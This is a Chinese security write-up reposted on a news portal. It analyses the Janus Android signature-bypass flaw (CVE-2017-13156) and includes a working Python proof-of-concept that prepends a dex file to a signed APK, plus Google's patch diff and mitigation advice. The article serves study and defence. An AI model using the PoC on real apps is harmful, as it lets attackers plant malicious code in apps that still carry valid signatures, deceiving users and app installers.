网易首页 > 网易号 > 正文 申请入驻

Janus签名漏洞(CVE-2017-13156)原理与利用分析

0
分享至

*本文原创作者:Tasfa,本文属FreeBuf原创奖励计划,未经许可禁止转载

0×00 简介

前言:去年比较严重的洞,以比较浅显的方式学习记录一下,网上有很多其他深度分析文章,也可借鉴学习。

Janus签名漏洞可以让攻击者绕过安卓系统的signature scheme V1签名机制,进而直接对App进行篡改。而且由于安卓系统的其他安全机制也是建立在签名和校验基础之上,该漏洞相当于绕过了安卓系统的整个安全机制。

公告详情: https://source.android.com/security/bulletin/2017-12-01

影响: 利用该漏洞的攻击者可注入恶意代码直接修改app而不影响其原始签名,即修改后仍是官方签名

影响范围: Android 5.0-8.0且使用Signaturescheme V1签名的APK文件,不影响Signaturescheme V2

自测:

adb shell dumpsys package pkgName | grep apkSigningVersion 0×01 漏洞原理

Android在4.4引入ART虚拟机,相比较于Dalvik虚拟机仅能运行包装于apk中的dex文件,ART还允许直接运行优化后的dex文件。具体操作是通过读取文件头部的magic字段进行判断,区别执行apk或者dex。

ZIP文件的读取方式是读取文件末尾定位的central directory, 然后通过里面的索引定位到各个zip entry,每个entry解压之后都对应一个文件。ParseZipArchive()函数在进行以上处理时候并没有判断文件头部的magic字段是否为504B0304(即Zip).

因此根据以上两点,攻击者可以通过将恶意dex文件置于apk文件的头部(如上图所示),在系统安装apk文件时,系统安装器解压zip时并没有先判断apk文件的头部magic字段,直接默认是apk(zip)文件,从而直接从文件尾部进行读取解压,此时签名没有任何变化,因此可欺骗系统,从而进行安装。

攻击关键点是当用户点击运行apk时,系统ART虚拟机会去判断文件头部的magic字段,从而使用不同的策略执行文件,由于该apk文件头部被修改为恶意dex,因此art虚拟机直接执行恶意dex文件。

0×02 漏洞利用

漏洞利用PoC:

#!/usr/bin/python import sys import struct import hashlib from zlib import adler32 def update_checksum(data): ''' 生成sha1 hash "<L" 小端存储unsigned long ''' m = hashlib.sha1() m.update(data[32:]) data[12:12+20] = m.digest() #计算Adler-32 checksum v = adler32(buffer(data[12:])) & 0xffffffff data[8:12] = struct.pack("<L", v) def main(): if len(sys.argv) != 4: print("usage: %s dex apk out_apk" % __file__) return _, dex, apk, out_apk = sys.argv #读取dex二进制数据 with open(dex, 'rb') as f: dex_data = bytearray(f.read()) dex_size = len(dex_data) #操作zip文件,可学习一下zip文件格式 with open(apk, 'rb') as f: apk_data = bytearray(f.read()) cd_end_addr = apk_data.rfind('\x50\x4b\x05\x06') #central directory 起始地址 cd_start_addr = struct.unpack("<L", apk_data[cd_end_addr+16:cd_end_addr+20])[0] apk_data[cd_end_addr+16:cd_end_addr+20] = struct.pack("<L", cd_start_addr+dex_size) pos = cd_start_addr while (pos < cd_end_addr): offset = struct.unpack("<L", apk_data[pos+42:pos+46])[0] apk_data[pos+42:pos+46] = struct.pack("<L", offset+dex_size) pos = apk_data.find("\x50\x4b\x01\x02", pos+46, cd_end_addr) if pos == -1: break #注入dex_data out_data = dex_data + apk_data out_data[32:36] = struct.pack("<L", len(out_data)) update_checksum(out_data) with open(out_apk, "wb") as f: f.write(out_data) print ('%s generated' % out_apk) if __name__ == '__main__': main() 0×03 漏洞防御

谷歌官方修复diff:

diff --git a/libziparchive/zip_archive.cc b/libziparchive/zip_archive.cc index 78de40a..d0bbd72 100644 --- a/libziparchive/zip_archive.cc +++ b/libziparchive/zip_archive.cc return -1; } } + + uint32_t lfh_start_bytes; + //读取zip头部信息 + if (!archive->mapped_zip.ReadAtOffset(reinterpret_cast<uint8_t*>(&lfh_start_bytes), + sizeof(uint32_t), 0)) { + ALOGW("Zip: Unable to read header for entry at offset == 0."); + return -1; + } + //增加kSignature头部验证,不同时返回-1 + if (lfh_start_bytes != LocalFileHeader::kSignature) { + ALOGW("Zip: Entry at offset zero has invalid LFH signature %" PRIx32, lfh_start_bytes); + #if defined(__ANDROID__) + android_errorWriteLog(0x534e4554, "64211847"); + #endif + return -1; + } + ALOGV("+++ zip good scan %" PRIu16 " entries", num_entries); return 0;

在解压zip文件时,调用函数ReadAtOffset()读取offset=0的magic字段是否为LocalFileHeader::kSignature(即0x04034b50)

防御:

使用Signaturescheme V2签名

前往官方网站下载正版应用或到阿里PP助手下载安全应用

0×04 参考

New Android vulnerability allows attackers to modify apps without affecting their signatures

Janus漏洞(CVE-2017-13156): 修改安卓app而不影响签名

安卓“Janus”漏洞的产生原理及利用过程

ZIP文件格式分析

*本文原创作者:Tasfa,本文属FreeBuf原创奖励计划,未经许可禁止转载

特别声明:以上内容(如有图片或视频亦包括在内)为自媒体平台“网易号”用户上传并发布,本平台仅提供信息存储服务。

Notice: The content above (including the pictures and videos if any) is uploaded and posted by a user of NetEase Hao, which is a social media platform and only provides information storage services.

相关推荐
热点推荐
剧情反转了?纪云浩副书记成了敢于担当的好干部?

剧情反转了?纪云浩副书记成了敢于担当的好干部?

杨逍
2024-04-26 13:44:46
纪云浩当兵照被扒出,帽子引热议,果然不简单,父亲身份曝光

纪云浩当兵照被扒出,帽子引热议,果然不简单,父亲身份曝光

180°视角
2024-04-24 22:24:34
“为大局服务”,到底什么才是大局呢?有网友想到答案!

“为大局服务”,到底什么才是大局呢?有网友想到答案!

翻开历史和现实
2024-04-26 14:51:46
探花翻车事故:女子拒绝换姿势态度嚣张被扇脸最后双方互殴

探花翻车事故:女子拒绝换姿势态度嚣张被扇脸最后双方互殴

挪威森林
2024-04-26 20:45:21
当年在罗马尼亚有个著名的笑话,你要是走的话,我们就不用走了!

当年在罗马尼亚有个著名的笑话,你要是走的话,我们就不用走了!

翻开历史和现实
2024-04-26 13:48:06
1987年12月,英国王室晚宴上,陈冲和戴安娜王妃的罕见合影

1987年12月,英国王室晚宴上,陈冲和戴安娜王妃的罕见合影

视点历史
2024-04-25 20:36:32
闹大了,四川居民存大量白酒被罚23,000,网友:存着喝也犯法?​

闹大了,四川居民存大量白酒被罚23,000,网友:存着喝也犯法?​

三月柳
2024-04-26 12:25:20
美国驻华大使馆发布中美外长会谈内容,却有多达七处被标注为“听不清”

美国驻华大使馆发布中美外长会谈内容,却有多达七处被标注为“听不清”

不掉线电波
2024-04-26 20:21:07
重磅,美已做好了与俄曹伊契四线同时作战的准备

重磅,美已做好了与俄曹伊契四线同时作战的准备

爱吃鱼的哆啦A梦
2024-04-26 09:33:19
高岗的地位究竟有多高?看这两张合影的站位,你就明白了

高岗的地位究竟有多高?看这两张合影的站位,你就明白了

文史茶馆2020
2024-04-01 14:44:15
越扒越深!干部阻拦春耕,纪云浩上边领导被挖出,曝更大的瓜

越扒越深!干部阻拦春耕,纪云浩上边领导被挖出,曝更大的瓜

180°视角
2024-04-26 15:41:15
蔓延到法国了?外媒曝光画面:马克龙母校发生亲巴勒斯坦抗议活动

蔓延到法国了?外媒曝光画面:马克龙母校发生亲巴勒斯坦抗议活动

环球网资讯
2024-04-26 21:45:15
果然没谈拢,布林肯访华,大批外资撤离中国,美国反帮了普京大忙

果然没谈拢,布林肯访华,大批外资撤离中国,美国反帮了普京大忙

朝晖前哨
2024-04-26 09:59:31
在地下车库遛狗后,狗竟抽搐死亡!上海居民气愤:车位旁有这东西…

在地下车库遛狗后,狗竟抽搐死亡!上海居民气愤:车位旁有这东西…

上海圈
2024-04-26 18:42:37
布林肯与中国领导人会谈,会场布置有变,中方送了其四个字

布林肯与中国领导人会谈,会场布置有变,中方送了其四个字

票姚校尉
2024-04-26 19:46:24
辅警杀害新婚妻子被判死缓,死者母亲:他隐瞒精神疾病,检方曾建议最严厉处罚

辅警杀害新婚妻子被判死缓,死者母亲:他隐瞒精神疾病,检方曾建议最严厉处罚

潇湘晨报
2024-04-26 19:15:09
一觉醒来,美国下一任总统已无悬念?63岁奥巴马出山,果然不简单

一觉醒来,美国下一任总统已无悬念?63岁奥巴马出山,果然不简单

乡野小珥
2024-04-26 17:53:09
清凉峰爬山后续:女子被插伤,嘴巴也裂了,深情老公再发声!

清凉峰爬山后续:女子被插伤,嘴巴也裂了,深情老公再发声!

古希腊掌管松饼的神
2024-04-26 15:36:18
深圳10区缩减2024年一般公共预算支出,强化“过紧日子”

深圳10区缩减2024年一般公共预算支出,强化“过紧日子”

界面新闻
2024-04-26 09:50:41
爱喝茅台的“美女贪官”:年近半百仍沉迷男色,单笔受贿超百万

爱喝茅台的“美女贪官”:年近半百仍沉迷男色,单笔受贿超百万

天闻地知
2024-04-16 09:37:13
2024-04-27 04:08:49
FreeBuf
FreeBuf
互联网安全新媒体
5549文章数 1757关注度
往期回顾 全部

头条要闻

官方回应环卫工用电子秤测灰尘:正常作业达标有奖励

头条要闻

官方回应环卫工用电子秤测灰尘:正常作业达标有奖励

体育要闻

首次先发就进球居勒尔破门,卡瓦哈尔横传送助攻

娱乐要闻

金靖回应不官宣恋情结婚的原因

财经要闻

贾跃亭,真他娘是个人才

科技要闻

车展观察|德系日系绝不能放弃中国市场

汽车要闻

2024北京车展 比亚迪的自驱力让对手紧追猛赶

态度原创

手机
时尚
房产
数码
公开课

手机要闻

塑料就是Low?我用回11年前的iPhone 5c:手感绝了

近五年最好笑打脸事件,繁殖狂富豪被捞女骗了?

房产要闻

海南最新房价出炉,三亚跌价最猛!

数码要闻

小米自带线充电宝 20000mAh 上架:支持 33W 功率,售价 159 元

公开课

睡前进食会让你发胖吗?

无障碍浏览 进入关怀版